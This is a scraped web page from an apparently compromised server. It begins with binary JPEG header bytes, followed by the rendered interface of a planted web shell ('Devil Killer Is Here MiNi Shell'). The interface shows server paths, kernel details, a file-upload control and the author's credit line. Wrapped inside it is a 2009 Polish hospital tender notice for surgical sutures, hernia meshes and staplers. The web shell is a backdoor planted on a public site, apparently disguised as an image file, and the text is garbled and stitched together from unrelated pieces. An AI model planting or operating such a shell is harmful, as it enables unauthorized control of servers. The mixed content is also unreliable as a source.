JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090306/53120-N-2009.html

<p class="kh_header"><b>Zawiercie: Dostawa materiałów szewnych: nici chirurgicznych, siatek przepuklinowych i staplerów dla Szpitala Powiatowego w Zawierciu - 16 zadań.</b><br>
<b>Numer ogłoszenia: 53120 - 2009; data zamieszczenia: 06.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Powiatowy , ul. Miodowa 14, 42-400 Zawiercie, woj. śląskie, tel. 032 6740361, faks 032 6721532.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalzawiercie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów szewnych: nici chirurgicznych, siatek przepuklinowych i staplerów dla Szpitala Powiatowego w Zawierciu - 16 zadań..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa materiałów szewnych do Apteki Szpitala Powiatowego w Zawierciu, przez okres 12 miesięcy.
Przedmiot zamówienia - 143 pozycje - został zgrupowany w 16 zadaniach.
119 pozycji ( 10 zadań ) - szwy wchłanialne i niewchłanialne
17 pozycje ( 3 pakiety) - staplery
7 pozycji ( 3 pakiety) - siatki przepuklinowe.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7, 33.14.11.21-4, 33.14.11.22-1, 33.14.11.28-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie przedmiotowego zamówienia mogą wziąć udział wykonawcy, którzy spełniają następujące warunki:

1.	Posiadają uprawnienia do wykonywania określonej działalności:
Do potwierdzenia:
- aktualnym  odpisem z właściwego rejestru albo aktualnym zaświadczeniem o wpisie do   
  ewidencji działalności gospodarczej, wystawionym nie wcześniej niż 6 miesięcy przed  
  upływem terminu składania ofert; (w przypadku podmiotów występujących wspólnie, dla  
  każdego partnera )

2.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej realizację zamówienia:
Do potwierdzenia:
-  oświadczeniem wg wzoru zał. nr 3 do SIWZ  
3.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem  technicznym i osobami zdolnymi do wykonania  zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

Do potwierdzenia:
      - oświadczeniem o spełnianiu warunku wg wzoru zał. nr 3
- wykazem wykonanych w okresie ostatnich trzech lat dostaw, a jeżeli okres prowadzenia   
  działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością   
  dostawie stanowiącej przedmiot zamówienia, z podaniem wartości, daty i miejsca wykonania  
  i odbiorców oraz załączeniem dokumentów potwierdzających, że dostawy  te zostały 
  wykonane należycie. Wykonawca potwierdzi spełnianie warunku udziału w postępowaniu, 
  jeżeli wykaz będzie zawierał co najmniej jedną wykonaną tego typu dostawę o wartości
  minimum 100% ceny ofertowej netto i zakresie odpowiadającym swoim rodzajem  
  przedmiotowi niniejszego zamówienia. Do każdej pozycji wykazu musi być załączony 
  dokument potwierdzający należyte wykonanie zamówienia. - wzór wykazu stanowi załącznik 
  nr  5   do SIWZ.

4.	Nie podlegają wykluczeniu na podstawie art. 24 ust. 1 oraz ust. 2 pkt 1 ustawy.

Do potwierdzenia:
-	oświadczeniem wg wzoru zał. nr 3 do SIWZ.

5.	W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w niniejszej specyfikacji do oferty należy dołączyć następujące dokumenty:

- dokumenty potwierdzające, że oferowane wyroby spełniają wymagania określone ustawą   
   o wyrobach medycznych (właściwe pozwolenia na dopuszczenie do obrotu i stosowania  
   na terenie RP, oznakowanie znakiem CE i deklaracja zgodności CE)
                     -  katalogi wraz z opisami technicznymi oferowanych wyrobów.    
                  -  próbki nici chirurgicznych i siatek przepuklinowych wymienione w 
                    załączniku nr 1, umożliwiające dokonanie oceny jakości oferowanych materiałów oraz 
                    sprawdzenie zgodności parametrów z wymaganymi w SIWZ.    

6.	Oferty przedstawione przez dwa lub więcej podmiotów występujących wspólnie, będą musiały spełniać następujące wymagania:
-oferta będzie zawierać aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (o którym mowa w pkt. 1), oraz oświadczenie według wzoru zał. nr 3  - dla każdego partnera,
- oferta będzie podpisana w taki sposób, by wiązała prawnie wszystkich partnerów,
- wszyscy partnerzy konsorcjum będą ponosić odpowiedzialność solidarną za wykonanie umowy zgodnie z jej postanowieniami,
- jeden z partnerów konsorcjum zostanie ustanowiony jako pełnomocnik upoważniony do reprezentowania wszystkich uczestników konsorcjum w postępowaniu albo w postępowaniu i podpisaniu umowy w sprawie zamówienia publicznego,
7.	 Każdy wykonawca przedłoży tylko jedną ofertę, sam lub jako partner w konsorcjum.   
     Wykonawca, który przedkłada lub partycypuje w więcej niż jednej ofercie spowoduje, że         
     wszystkie oferty z udziałem tego wykonawcy zostaną odrzucone.
8.	 Przy ocenie spełniania warunków udziału przez wykonawców wspólnie ubiegających się o udzielenie zamówienia wielkości stanowiące  o spełnianiu warunków merytorycznych (potencjał techniczny i finansowy) będą oceniane łącznie natomiast warunki formalne indywidualnie. Nie spełnienie powyższych wymagań spowoduje wykluczenie oferty ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oferta powinna zawierać:
- wypełniony formularz ofertowy wg wzoru stanowiącego załącznik nr 1 do siwz
- wypełnione formularze cenowe na zadania, których dotyczy oferta  - zał. nr 2 do SIWZ
- oświadczenie na formularzu stanowiącym załącznik nr 3 do SIWZ o spełnianiu wymagań z art. 22 ust. 1 oraz że wykonawca nie podlega wykluczeniu na podstawie art. 24 ust. 1,
- aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
- dokumenty potwierdzające, że wszystkie oferowane wyroby posiadają wymagane przepisami ustawy z dnia 20 kwietnia 2004r. o wyrobach medycznych właściwe pozwolenie na dopuszczenie do obrotu i stosowania na terenie Polski.
- katalogi wraz z opisami technicznymi oferowanych wyrobów,
- próbki nici chirurgicznych i siatek przepuklinowych wskazane w SIWZ,
- pełnomocnictwo do reprezentowania Wykonawcy, jeżeli nie wynika z dokumentów rejestrowych, załączonych do oferty.
- wykaz wykonanych w okresie ostatnich trzech lat dostaw, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem wartości przedmiotu, daty i miejsca wykonania, odbiorców oraz załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane należycie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - Walory techniczne - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpitalzawiercie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Powiatowy w Zawierciu
ul. Miodowa 14
42-400 Zawiercie
Dział Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2009 godzina 10:00, miejsce: Szpital Powiatowy w Zawierciu
ul. Miodowa 14
42-400 Zawiercie
Dział Zamówień Publicznych.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szwy wchłanialne dla Bloku OPeracyjnego Oddziału Chirurgii Ogólnej - 21 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Walory techniczne przedmiotu zamówienia - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szwy niewchłanialne, niewchłanialny wosk kostny dla Bloku Operacyjnego Chirurgii Ogólnej - 18 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Walory techniczne przedmiotu zamówienia - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szwy szybkowchłanialne dla Bloku Operacyjnego Chirurgii Ogólnej - 2 pozycje.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Walory techniczne przedmiotu zamówienia - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wchłanialne materiały hemostatyczne dla Bloku Operacyjnego Chirurgii Ogólnej - 2 pozycje.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szwy wchłanialne dla Bloku Operacyjnego Chirurgii Urazowej - 19 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Walory techniczne przedmiotu zamowienia - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szwy niewchłanialne dla Bloku Operacyjnego Chirurgii Urazowej - 13 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Walory techniczne przedmiotu zamówienia - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materiały hemostatyczne dla Bloku Operacyjnego Chirurgii Urazowej - 3 pozycje.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nici chirurgiczne i materiały szewne, specjalistyczne dla Oddziału Ginekolog.-Położniczego - 21 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Walory techniczne przedmiotu zamówienia - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nici chirurgiczne dla Izby Przyjęć, OAiIT, Oddz. Otolaryngologii - 12 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Walory techniczne przedmiotu zamowienia - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nici chirurgiczne dla Bloku Operacyjnego Oddziału Okulistycznego - 8 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Walory techniczne przedmiotu zamówienia - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Staplery - 3 pozycje.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.22-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Staplery - 10 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.22-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Staplery - 4 pozycje.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.22-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Siatka przepuklinowa niewchłanialna - 4 pozycje.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Walory techniczne przedmiotu zamówienia - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Siatka przepuklinowa częściowo-wchłanialna - 1 pozycja.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Walory techniczne przedmiotu zamówienia - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Siatka przepuklinowa częściowo-wchłanialna - 2 pozycje.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Walory techniczne przedmiotu zamówienia - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com